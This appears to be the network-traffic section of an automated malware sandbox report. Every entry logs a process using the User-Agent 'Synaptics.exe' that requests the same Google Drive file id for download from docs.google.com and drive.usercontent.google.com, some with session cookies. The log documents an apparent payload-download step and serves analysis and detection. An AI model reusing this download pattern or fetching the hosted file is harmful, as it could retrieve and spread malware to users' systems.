                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=BBE26vPeC2hszqsXJ1ynrQW_9kLsZpsHYQPDP6eN2y2zdlFo-23O9GeRsAmPENzIlI7naznndqiKAzIJmuZItjQAXwfSAfPPnvZybJ9AaZfi_PUMO8gtrIeAc_xFc3PJOBW4tiY_9Etp3P_tRX_kZ_fi85pZ8xHBt0DyAqqJlwGZY_uPHd-1V5ba
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=BBE26vPeC2hszqsXJ1ynrQW_9kLsZpsHYQPDP6eN2y2zdlFo-23O9GeRsAmPENzIlI7naznndqiKAzIJmuZItjQAXwfSAfPPnvZybJ9AaZfi_PUMO8gtrIeAc_xFc3PJOBW4tiY_9Etp3P_tRX_kZ_fi85pZ8xHBt0DyAqqJlwGZY_uPHd-1V5ba
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=AjF33IdaeUNmHlmeyv_rklrZSnVFv8lgySmei1Dsqdy2rFxSjjfnAO-cl39aHo2JrrTKdNoIFV6ku8M9RkVKkd4wDR3j0NCN6DfoPbxsWlGAYN6sqEfJqKWWg0zy5MERV4xjBejEASTfCcn004MOi4zjgfmGet7SvpsNHYPAqhjQfvoi6GZ98aQ
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=AjF33IdaeUNmHlmeyv_rklrZSnVFv8lgySmei1Dsqdy2rFxSjjfnAO-cl39aHo2JrrTKdNoIFV6ku8M9RkVKkd4wDR3j0NCN6DfoPbxsWlGAYN6sqEfJqKWWg0zy5MERV4xjBejEASTfCcn004MOi4zjgfmGet7SvpsNHYPAqhjQfvoi6GZ98aQ
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=AjF33IdaeUNmHlmeyv_rklrZSnVFv8lgySmei1Dsqdy2rFxSjjfnAO-cl39aHo2JrrTKdNoIFV6ku8M9RkVKkd4wDR3j0NCN6DfoPbxsWlGAYN6sqEfJqKWWg0zy5MERV4xjBejEASTfCcn004MOi4zjgfmGet7SvpsNHYPAqhjQfvoi6GZ98aQ
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=AjF33IdaeUNmHlmeyv_rklrZSnVFv8lgySmei1Dsqdy2rFxSjjfnAO-cl39aHo2JrrTKdNoIFV6ku8M9RkVKkd4wDR3j0NCN6DfoPbxsWlGAYN6sqEfJqKWWg0zy5MERV4xjBejEASTfCcn004MOi4zjgfmGet7SvpsNHYPAqhjQfvoi6GZ98aQ
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
